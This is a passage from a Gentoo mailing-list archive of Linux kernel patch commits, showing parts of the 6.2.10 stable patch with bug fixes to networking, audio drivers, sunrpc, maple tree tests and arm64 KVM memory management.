+ 				(GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
+ 				__GFP_NOWARN | __GFP_NORETRY);
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 5c2fb992803b7..3a70255c8d02f 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -393,10 +393,12 @@ static struct qrtr_node *qrtr_node_lookup(unsigned int nid)
+ 	struct qrtr_node *node;
+ 	unsigned long flags;
+ 
++	mutex_lock(&qrtr_node_lock);
+ 	spin_lock_irqsave(&qrtr_nodes_lock, flags);
+ 	node = radix_tree_lookup(&qrtr_nodes, nid);
+ 	node = qrtr_node_acquire(node);
+ 	spin_unlock_irqrestore(&qrtr_nodes_lock, flags);
++	mutex_unlock(&qrtr_node_lock);
+ 
+ 	return node;
+ }
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index e595079c2cafe..3e40a1ba48f79 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -273,7 +273,7 @@ err:
+ 	return NULL;
+ }
+ 
+-static int server_del(struct qrtr_node *node, unsigned int port)
++static int server_del(struct qrtr_node *node, unsigned int port, bool bcast)
+ {
+ 	struct qrtr_lookup *lookup;
+ 	struct qrtr_server *srv;
+@@ -286,7 +286,7 @@ static int server_del(struct qrtr_node *node, unsigned int port)
+ 	radix_tree_delete(&node->servers, port);
+ 
+ 	/* Broadcast the removal of local servers */
+-	if (srv->node == qrtr_ns.local_node)
++	if (srv->node == qrtr_ns.local_node && bcast)
+ 		service_announce_del(&qrtr_ns.bcast_sq, srv);
+ 
+ 	/* Announce the service's disappearance to observers */
+@@ -372,7 +372,7 @@ static int ctrl_cmd_bye(struct sockaddr_qrtr *from)
+ 		}
+ 		slot = radix_tree_iter_resume(slot, &iter);
+ 		rcu_read_unlock();
+-		server_del(node, srv->port);
++		server_del(node, srv->port, true);
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+@@ -458,10 +458,13 @@ static int ctrl_cmd_del_client(struct sockaddr_qrtr *from,
+ 		kfree(lookup);
+ 	}
+ 
+-	/* Remove the server belonging to this port */
++	/* Remove the server belonging to this port but don't broadcast
++	 * DEL_SERVER. Neighbours would've already removed the server belonging
++	 * to this port due to the DEL_CLIENT broadcast from qrtr_port_remove().
++	 */
+ 	node = node_get(node_id);
+ 	if (node)
+-		server_del(node, port);
++		server_del(node, port, false);
+ 
+ 	/* Advertise the removal of this client to all local servers */
+ 	local_node = node_get(qrtr_ns.local_node);
+@@ -566,7 +569,7 @@ static int ctrl_cmd_del_server(struct sockaddr_qrtr *from,
+ 	if (!node)
+ 		return -ENOENT;
+ 
+-	return server_del(node, port);
++	return server_del(node, port, true);
+ }
+ 
+ static int ctrl_cmd_new_lookup(struct sockaddr_qrtr *from,
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 84021a6c4f9da..ec7d1a89efbbd 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -1829,6 +1829,10 @@ static int sctp_sendmsg_to_asoc(struct sctp_association *asoc,
+ 		err = sctp_wait_for_sndbuf(asoc, &timeo, msg_len);
+ 		if (err)
+ 			goto err;
++		if (unlikely(sinfo->sinfo_stream >= asoc->stream.outcnt)) {
++			err = -EINVAL;
++			goto err;
++		}
+ 	}
+ 
+ 	if (sctp_state(asoc, CLOSED)) {
+diff --git a/net/sunrpc/svcauth_unix.c b/net/sunrpc/svcauth_unix.c
+index b1efc34db6ed8..609ade4fb49ed 100644
+--- a/net/sunrpc/svcauth_unix.c
++++ b/net/sunrpc/svcauth_unix.c
+@@ -416,14 +416,23 @@ static int unix_gid_hash(kuid_t uid)
+ 	return hash_long(from_kuid(&init_user_ns, uid), GID_HASHBITS);
+ }
+ 
+-static void unix_gid_put(struct kref *kref)
++static void unix_gid_free(struct rcu_head *rcu)
+ {
+-	struct cache_head *item = container_of(kref, struct cache_head, ref);
+-	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++	struct unix_gid *ug = container_of(rcu, struct unix_gid, rcu);
++	struct cache_head *item = &ug->h;
++
+ 	if (test_bit(CACHE_VALID, &item->flags) &&
+ 	    !test_bit(CACHE_NEGATIVE, &item->flags))
+ 		put_group_info(ug->gi);
+-	kfree_rcu(ug, rcu);
++	kfree(ug);
++}
++
++static void unix_gid_put(struct kref *kref)
++{
++	struct cache_head *item = container_of(kref, struct cache_head, ref);
++	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++
++	call_rcu(&ug->rcu, unix_gid_free);
+ }
+ 
+ static int unix_gid_match(struct cache_head *corig, struct cache_head *cnew)
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 9ea633fe93393..4ffa3a59f419f 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -81,6 +81,7 @@ struct hdmi_spec_per_pin {
+ 	struct delayed_work work;
+ 	struct hdmi_pcm *pcm; /* pointer to spec->pcm_rec[n] dynamically*/
+ 	int pcm_idx; /* which pcm is attached. -1 means no pcm is attached */
++	int prev_pcm_idx; /* previously assigned pcm index */
+ 	int repoll_count;
+ 	bool setup; /* the stream has been set up by prepare callback */
+ 	bool silent_stream;
+@@ -1380,9 +1381,17 @@ static void hdmi_attach_hda_pcm(struct hdmi_spec *spec,
+ 	/* pcm already be attached to the pin */
+ 	if (per_pin->pcm)
+ 		return;
++	/* try the previously used slot at first */
++	idx = per_pin->prev_pcm_idx;
++	if (idx >= 0) {
++		if (!test_bit(idx, &spec->pcm_bitmap))
++			goto found;
++		per_pin->prev_pcm_idx = -1; /* no longer valid, clear it */
++	}
+ 	idx = hdmi_find_pcm_slot(spec, per_pin);
+ 	if (idx == -EBUSY)
+ 		return;
++ found:
+ 	per_pin->pcm_idx = idx;
+ 	per_pin->pcm = get_hdmi_pcm(spec, idx);
+ 	set_bit(idx, &spec->pcm_bitmap);
+@@ -1398,6 +1407,7 @@ static void hdmi_detach_hda_pcm(struct hdmi_spec *spec,
+ 		return;
+ 	idx = per_pin->pcm_idx;
+ 	per_pin->pcm_idx = -1;
++	per_pin->prev_pcm_idx = idx; /* remember the previous index */
+ 	per_pin->pcm = NULL;
+ 	if (idx >= 0 && idx < spec->pcm_used)
+ 		clear_bit(idx, &spec->pcm_bitmap);
+@@ -1924,6 +1934,7 @@ static int hdmi_add_pin(struct hda_codec *codec, hda_nid_t pin_nid)
+ 
+ 		per_pin->pcm = NULL;
+ 		per_pin->pcm_idx = -1;
++		per_pin->prev_pcm_idx = -1;
+ 		per_pin->pin_nid = pin_nid;
+ 		per_pin->pin_nid_idx = spec->num_nids;
+ 		per_pin->dev_id = i;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 070150bbd3559..50b8573b52066 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2624,6 +2624,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1462, 0xda57, "MSI Z270-Gaming", ALC1220_FIXUP_GB_DUAL_CODECS),
+ 	SND_PCI_QUIRK_VENDOR(0x1462, "MSI", ALC882_FIXUP_GPIO3),
+ 	SND_PCI_QUIRK(0x147b, 0x107a, "Abit AW9D-MAX", ALC882_FIXUP_ABIT_AW9D_MAX),
++	SND_PCI_QUIRK(0x1558, 0x3702, "Clevo X370SN[VW]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x50d3, "Clevo PC50[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d1, "Clevo PB51[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d2, "Clevo PB51R[CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -9442,6 +9443,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5d, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b5e, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8b66, "HP", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7a, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b7d, "HP", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b87, "HP", ALC236_FIXUP_HP_GPIO_LED),
+diff --git a/sound/soc/codecs/hdac_hdmi.c b/sound/soc/codecs/hdac_hdmi.c
+index ed4f7cdda04ff..8b6b760296948 100644
+--- a/sound/soc/codecs/hdac_hdmi.c
++++ b/sound/soc/codecs/hdac_hdmi.c
+@@ -436,23 +436,28 @@ static int hdac_hdmi_setup_audio_infoframe(struct hdac_device *hdev,
+ 	return 0;
+ }
+ 
+-static int hdac_hdmi_set_tdm_slot(struct snd_soc_dai *dai,
+-		unsigned int tx_mask, unsigned int rx_mask,
+-		int slots, int slot_width)
++static int hdac_hdmi_set_stream(struct snd_soc_dai *dai,
++				void *stream, int direction)
+ {
+ 	struct hdac_hdmi_priv *hdmi = snd_soc_dai_get_drvdata(dai);
+ 	struct hdac_device *hdev = hdmi->hdev;
+ 	struct hdac_hdmi_dai_port_map *dai_map;
+ 	struct hdac_hdmi_pcm *pcm;
++	struct hdac_stream *hstream;
+ 
+-	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, tx_mask);
++	if (!stream)
++		return -EINVAL;
++
++	hstream = (struct hdac_stream *)stream;
++
++	dev_dbg(&hdev->dev, "%s: strm_tag: %d\n", __func__, hstream->stream_tag);
+ 
+ 	dai_map = &hdmi->dai_map[dai->id];
+ 
+ 	pcm = hdac_hdmi_get_pcm_from_cvt(hdmi, dai_map->cvt);
+ 
+ 	if (pcm)
+-		pcm->stream_tag = (tx_mask << 4);
++		pcm->stream_tag = (hstream->stream_tag << 4);
+ 
+ 	return 0;
+ }
+@@ -1544,7 +1549,7 @@ static const struct snd_soc_dai_ops hdmi_dai_ops = {
+ 	.startup = hdac_hdmi_pcm_open,
+ 	.shutdown = hdac_hdmi_pcm_close,
+ 	.hw_params = hdac_hdmi_set_hw_params,
+-	.set_tdm_slot = hdac_hdmi_set_tdm_slot,
++	.set_stream = hdac_hdmi_set_stream,
+ };
+ 
+ /*
+diff --git a/sound/soc/codecs/lpass-rx-macro.c b/sound/soc/codecs/lpass-rx-macro.c
+index 8621cfabcf5b6..1639f3b66facb 100644
+--- a/sound/soc/codecs/lpass-rx-macro.c
++++ b/sound/soc/codecs/lpass-rx-macro.c
+@@ -3667,9 +3667,9 @@ static int __maybe_unused rx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(rx->regmap, true);
+ 	regcache_mark_dirty(rx->regmap);
+ 
+-	clk_disable_unprepare(rx->mclk);
+-	clk_disable_unprepare(rx->npl);
+ 	clk_disable_unprepare(rx->fsgen);
++	clk_disable_unprepare(rx->npl);
++	clk_disable_unprepare(rx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-tx-macro.c b/sound/soc/codecs/lpass-tx-macro.c
+index 8facdb922f076..9f33289ce2174 100644
+--- a/sound/soc/codecs/lpass-tx-macro.c
++++ b/sound/soc/codecs/lpass-tx-macro.c
+@@ -2093,9 +2093,9 @@ static int __maybe_unused tx_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(tx->regmap, true);
+ 	regcache_mark_dirty(tx->regmap);
+ 
+-	clk_disable_unprepare(tx->mclk);
+-	clk_disable_unprepare(tx->npl);
+ 	clk_disable_unprepare(tx->fsgen);
++	clk_disable_unprepare(tx->npl);
++	clk_disable_unprepare(tx->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index c0b86d69c72e3..01149b20b4c93 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -2504,9 +2504,9 @@ static int __maybe_unused wsa_macro_runtime_suspend(struct device *dev)
+ 	regcache_cache_only(wsa->regmap, true);
+ 	regcache_mark_dirty(wsa->regmap);
+ 
+-	clk_disable_unprepare(wsa->mclk);
+-	clk_disable_unprepare(wsa->npl);
+ 	clk_disable_unprepare(wsa->fsgen);
++	clk_disable_unprepare(wsa->npl);
++	clk_disable_unprepare(wsa->mclk);
+ 
+ 	return 0;
+ }
+diff --git a/sound/soc/sof/ipc4-topology.c b/sound/soc/sof/ipc4-topology.c
+index 6da6137fa2cbc..4f7adbe671f3e 100644
+--- a/sound/soc/sof/ipc4-topology.c
++++ b/sound/soc/sof/ipc4-topology.c
+@@ -1686,6 +1686,14 @@ static int sof_ipc4_route_setup(struct snd_sof_dev *sdev, struct snd_sof_route *
+ 	u32 header, extension;
+ 	int ret;
+ 
++	if (!src_fw_module || !sink_fw_module) {
++		/* The NULL module will print as "(efault)" */
++		dev_err(sdev->dev, "source %s or sink %s widget weren't set up properly\n",
++			src_fw_module->man4_module_entry.name,
++			sink_fw_module->man4_module_entry.name);
++		return -ENODEV;
++	}
++
+ 	sroute->src_queue_id = sof_ipc4_get_queue_id(src_widget, sink_widget,
+ 						     SOF_PIN_TYPE_SOURCE);
+ 	if (sroute->src_queue_id < 0) {
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index 74cd7e9560193..280fc89043b16 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -393,6 +393,9 @@ static int sof_ipc4_tx_msg(struct snd_sof_dev *sdev, void *msg_data, size_t msg_
+ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 				 size_t payload_bytes, bool set)
+ {
++	const struct sof_dsp_power_state target_state = {
++			.state = SOF_DSP_PM_D0,
++	};
+ 	size_t payload_limit = sdev->ipc->max_payload_size;
+ 	struct sof_ipc4_msg *ipc4_msg = data;
+ 	struct sof_ipc4_msg tx = {{ 0 }};
+@@ -423,6 +426,11 @@ static int sof_ipc4_set_get_data(struct snd_sof_dev *sdev, void *data,
+ 
+ 	tx.extension |= SOF_IPC4_MOD_EXT_MSG_FIRST_BLOCK(1);
+ 
++	/* ensure the DSP is in D0i0 before sending IPC */
++	ret = snd_sof_dsp_set_power_state(sdev, &target_state);
++	if (ret < 0)
++		return ret;
++
+ 	/* Serialise IPC TX */
+ 	mutex_lock(&sdev->ipc->tx_mutex);
+ 
+diff --git a/tools/testing/radix-tree/maple.c b/tools/testing/radix-tree/maple.c
+index 81fa7ec2e66a1..1f36bc1c5d362 100644
+--- a/tools/testing/radix-tree/maple.c
++++ b/tools/testing/radix-tree/maple.c
+@@ -173,11 +173,11 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 
+ 		if (!MAPLE_32BIT) {
+ 			if (i >= 35)
+-				e = i - 35;
++				e = i - 34;
+ 			else if (i >= 5)
+-				e = i - 5;
++				e = i - 4;
+ 			else if (i >= 2)
+-				e = i - 2;
++				e = i - 1;
+ 		} else {
+ 			if (i >= 4)
+ 				e = i - 4;
+@@ -305,17 +305,17 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	mn = mas_pop_node(&mas); /* get the next node. */
+ 	MT_BUG_ON(mt, mn == NULL);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 2);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
+ 
+ 	mas_push_node(&mas, mn);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count != MAPLE_ALLOC_SLOTS);
+ 
+ 	/* Check the limit of pop/push/pop */
+ 	mas_node_count(&mas, MAPLE_ALLOC_SLOTS + 2); /* Request */
+@@ -323,14 +323,14 @@ static noinline void check_new_node(struct maple_tree *mt)
+ 	MT_BUG_ON(mt, mas.node != MA_ERROR(-ENOMEM));
+ 	MT_BUG_ON(mt, !mas_nomem(&mas, GFP_KERNEL));
+ 	MT_BUG_ON(mt, mas_alloc_req(&mas));
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 1);
+-	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS - 1);
++	MT_BUG_ON(mt, mas.alloc->node_count  != MAPLE_ALLOC_SLOTS);
+ 	mas_push_node(&mas, mn);
+-	MT_BUG_ON(mt, mas.alloc->node_count);
++	MT_BUG_ON(mt, mas.alloc->node_count != 1);
+ 	MT_BUG_ON(mt, mas_allocated(&mas) != MAPLE_ALLOC_SLOTS + 2);
+ 	mn = mas_pop_node(&mas);
+ 	MT_BUG_ON(mt, not_empty(mn));


* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-04-06 10:40 Alice Ferrazzi
  0 siblings, 0 replies; 30+ messages in thread
From: Alice Ferrazzi @ 2023-04-06 10:40 UTC (permalink / raw
  To: gentoo-commits

commit:     552322bbd8665a864a089b06ed41c97e413562b9
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Apr  6 10:40:26 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Apr  6 10:40:26 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=552322bb

Linux patch 6.2.10

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |     4 +
 1009_linux-6.2.10.patch | 10600 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 10604 insertions(+)

diff --git a/0000_README b/0000_README
index 47edd2da..93bcb21e 100644
--- a/0000_README
+++ b/0000_README
@@ -79,6 +79,10 @@ Patch:  1008_linux-6.2.9.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.9
 
+Patch:  1009_linux-6.2.10.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.10
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1009_linux-6.2.10.patch b/1009_linux-6.2.10.patch
new file mode 100644
index 00000000..980ca4df
--- /dev/null
+++ b/1009_linux-6.2.10.patch
@@ -0,0 +1,10600 @@
+diff --git a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+index 3fe981b14e2cb..54736362378eb 100644
+--- a/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
++++ b/Documentation/devicetree/bindings/mtd/jedec,spi-nor.yaml
+@@ -76,6 +76,13 @@ properties:
+       If "broken-flash-reset" is present then having this property does not
+       make any difference.
+ 
++  spi-cpol: true
++  spi-cpha: true
++
++dependencies:
++  spi-cpol: [ spi-cpha ]
++  spi-cpha: [ spi-cpol ]
++
+ unevaluatedProperties: false
+ 
+ examples:
+diff --git a/Makefile b/Makefile
+index 8732f7208d59b..6ec0ec452e465 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 9
++SUBLEVEL = 10
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/kvm/mmu.c b/arch/arm64/kvm/mmu.c
+index a3ee3b605c9b8..3c24178bd4935 100644
+--- a/arch/arm64/kvm/mmu.c
++++ b/arch/arm64/kvm/mmu.c
+@@ -665,14 +665,33 @@ static int get_user_mapping_size(struct kvm *kvm, u64 addr)
+ 				   CONFIG_PGTABLE_LEVELS),
+ 		.mm_ops		= &kvm_user_mm_ops,
+ 	};
++	unsigned long flags;
+ 	kvm_pte_t pte = 0;	/* Keep GCC quiet... */
+ 	u32 level = ~0;
+ 	int ret;
+ 
++	/*
++	 * Disable IRQs so that we hazard against a concurrent
++	 * teardown of the userspace page tables (which relies on
++	 * IPI-ing threads).
++	 */
++	local_irq_save(flags);
+ 	ret = kvm_pgtable_get_leaf(&pgt, addr, &pte, &level);
+-	VM_BUG_ON(ret);
+-	VM_BUG_ON(level >= KVM_PGTABLE_MAX_LEVELS);
+-	VM_BUG_ON(!(pte & PTE_VALID));
++	local_irq_restore(flags);
++
++	if (ret)
++		return ret;
++
++	/*
++	 * Not seeing an error, but not updating level? Something went
++	 * deeply wrong...
++	 */
++	if (WARN_ON(level >= KVM_PGTABLE_MAX_LEVELS))
++		return -EFAULT;
++
++	/* Oops, the userspace PTs are gone... Replay the fault */
++	if (!kvm_pte_valid(pte))
++		return -EAGAIN;
+ 
+ 	return BIT(ARM64_HW_PGTABLE_LEVEL_SHIFT(level));
+ }
+@@ -1079,7 +1098,7 @@ static bool fault_supports_stage2_huge_mapping(struct kvm_memory_slot *memslot,
+  *
+  * Returns the size of the mapping.
+  */
+-static unsigned long
++static long
+ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 			    unsigned long hva, kvm_pfn_t *pfnp,
+ 			    phys_addr_t *ipap)
+@@ -1091,8 +1110,15 @@ transparent_hugepage_adjust(struct kvm *kvm, struct kvm_memory_slot *memslot,
+ 	 * sure that the HVA and IPA are sufficiently aligned and that the
+ 	 * block map is contained within the memslot.
+ 	 */
+-	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE) &&
+-	    get_user_mapping_size(kvm, hva) >= PMD_SIZE) {
++	if (fault_supports_stage2_huge_mapping(memslot, hva, PMD_SIZE)) {
++		int sz = get_user_mapping_size(kvm, hva);
++
++		if (sz < 0)
++			return sz;
++
++		if (sz < PMD_SIZE)
++			return PAGE_SIZE;
++
+ 		/*
+ 		 * The address we faulted on is backed by a transparent huge
+ 		 * page.  However, because we map the compound huge page and
+@@ -1192,7 +1218,7 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ {
+ 	int ret = 0;
+ 	bool write_fault, writable, force_pte = false;
+-	bool exec_fault;
++	bool exec_fault, mte_allowed;
+ 	bool device = false;
+ 	unsigned long mmu_seq;
+ 	struct kvm *kvm = vcpu->kvm;
+@@ -1203,7 +1229,7 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 	kvm_pfn_t pfn;
+ 	bool logging_active = memslot_is_logging(memslot);
+ 	unsigned long fault_level = kvm_vcpu_trap_get_fault_level(vcpu);
+-	unsigned long vma_pagesize, fault_granule;
++	long vma_pagesize, fault_granule;
+ 	enum kvm_pgtable_prot prot = KVM_PGTABLE_PROT_R;
+ 	struct kvm_pgtable *pgt;
+ 
+@@ -1217,6 +1243,20 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		return -EFAULT;
+ 	}
+ 
++	/*
++	 * Permission faults just need to update the existing leaf entry,
++	 * and so normally don't require allocations from the memcache. The
++	 * only exception to this is when dirty logging is enabled at runtime
++	 * and a write fault needs to collapse a block entry into a table.
++	 */
++	if (fault_status != ESR_ELx_FSC_PERM ||
++	    (logging_active && write_fault)) {
++		ret = kvm_mmu_topup_memory_cache(memcache,
++						 kvm_mmu_cache_min_pages(kvm));
++		if (ret)
++			return ret;
++	}
++
+ 	/*
+ 	 * Let's check if we will get back a huge page backed by hugetlbfs, or
+ 	 * get block mapping for device MMIO region.
+@@ -1269,37 +1309,21 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 		fault_ipa &= ~(vma_pagesize - 1);
+ 
+ 	gfn = fault_ipa >> PAGE_SHIFT;
+-	mmap_read_unlock(current->mm);
++	mte_allowed = kvm_vma_mte_allowed(vma);
+ 
+-	/*
+-	 * Permission faults just need to update the existing leaf entry,
+-	 * and so normally don't require allocations from the memcache. The
+-	 * only exception to this is when dirty logging is enabled at runtime
+-	 * and a write fault needs to collapse a block entry into a table.
+-	 */
+-	if (fault_status != ESR_ELx_FSC_PERM ||
+-	    (logging_active && write_fault)) {
+-		ret = kvm_mmu_topup_memory_cache(memcache,
+-						 kvm_mmu_cache_min_pages(kvm));
+-		if (ret)
+-			return ret;
+-	}
++	/* Don't use the VMA after the unlock -- it may have vanished */
++	vma = NULL;
+ 
+-	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
+ 	/*
+-	 * Ensure the read of mmu_invalidate_seq happens before we call
+-	 * gfn_to_pfn_prot (which calls get_user_pages), so that we don't risk
+-	 * the page we just got a reference to gets unmapped before we have a
+-	 * chance to grab the mmu_lock, which ensure that if the page gets
+-	 * unmapped afterwards, the call to kvm_unmap_gfn will take it away
+-	 * from us again properly. This smp_rmb() interacts with the smp_wmb()
+-	 * in kvm_mmu_notifier_invalidate_<page|range_end>.
++	 * Read mmu_invalidate_seq so that KVM can detect if the results of
++	 * vma_lookup() or __gfn_to_pfn_memslot() become stale prior to
++	 * acquiring kvm->mmu_lock.
+ 	 *
+-	 * Besides, __gfn_to_pfn_memslot() instead of gfn_to_pfn_prot() is
+-	 * used to avoid unnecessary overhead introduced to locate the memory
+-	 * slot because it's always fixed even @gfn is adjusted for huge pages.
++	 * Rely on mmap_read_unlock() for an implicit smp_rmb(), which pairs
++	 * with the smp_wmb() in kvm_mmu_invalidate_end().
+ 	 */
+-	smp_rmb();
++	mmu_seq = vcpu->kvm->mmu_invalidate_seq;
++	mmap_read_unlock(current->mm);
+ 
+ 	pfn = __gfn_to_pfn_memslot(memslot, gfn, false, false, NULL,
+ 				   write_fault, &writable, NULL);
+@@ -1350,11 +1374,16 @@ static int user_mem_abort(struct kvm_vcpu *vcpu, phys_addr_t fault_ipa,
+ 			vma_pagesize = transparent_hugepage_adjust(kvm, memslot,
+ 								   hva, &pfn,
+ 								   &fault_ipa);
++
++		if (vma_pagesize < 0) {
++			ret = vma_pagesize;
++			goto out_unlock;
++		}
+ 	}
+ 
+ 	if (fault_status != ESR_ELx_FSC_PERM && !device && kvm_has_mte(kvm)) {
+ 		/* Check the VMM hasn't introduced a new disallowed VMA */
+-		if (kvm_vma_mte_allowed(vma)) {
++		if (mte_allowed) {
+ 			sanitise_mte_tags(kvm, pfn, vma_pagesize);
+ 		} else {
+ 			ret = -EFAULT;
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index 24908400e1906..c243b10f3e150 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -538,7 +538,8 @@ void kvm_pmu_handle_pmcr(struct kvm_vcpu *vcpu, u64 val)
+ 	if (!kvm_pmu_is_3p5(vcpu))
+ 		val &= ~ARMV8_PMU_PMCR_LP;
+ 
+-	__vcpu_sys_reg(vcpu, PMCR_EL0) = val;
++	/* The reset bits don't indicate any state, and shouldn't be saved. */
++	__vcpu_sys_reg(vcpu, PMCR_EL0) = val & ~(ARMV8_PMU_PMCR_C | ARMV8_PMU_PMCR_P);
+ 
+ 	if (val & ARMV8_PMU_PMCR_E) {
+ 		kvm_pmu_enable_counter_mask(vcpu,
+diff --git a/arch/arm64/kvm/sys_regs.c b/arch/arm64/kvm/sys_regs.c
+index c6cbfe6b854b3..c48c053d61466 100644
+--- a/arch/arm64/kvm/sys_regs.c
++++ b/arch/arm64/kvm/sys_regs.c
+@@ -765,6 +765,22 @@ static bool pmu_counter_idx_valid(struct kvm_vcpu *vcpu, u64 idx)
+ 	return true;
+ }
+ 
++static int get_pmu_evcntr(struct kvm_vcpu *vcpu, const struct sys_reg_desc *r,
++			  u64 *val)
++{
++	u64 idx;
++
++	if (r->CRn == 9 && r->CRm == 13 && r->Op2 == 0)
++		/* PMCCNTR_EL0 */
++		idx = ARMV8_PMU_CYCLE_IDX;
++	else
++		/* PMEVCNTRn_EL0 */
++		idx = ((r->CRm & 3) << 3) | (r->Op2 & 7);
++
++	*val = kvm_pmu_get_counter_value(vcpu, idx);
++	return 0;
++}
++
+ static bool access_pmu_evcntr(struct kvm_vcpu *vcpu,
+ 			      struct sys_reg_params *p,
+ 			      const struct sys_reg_desc *r)
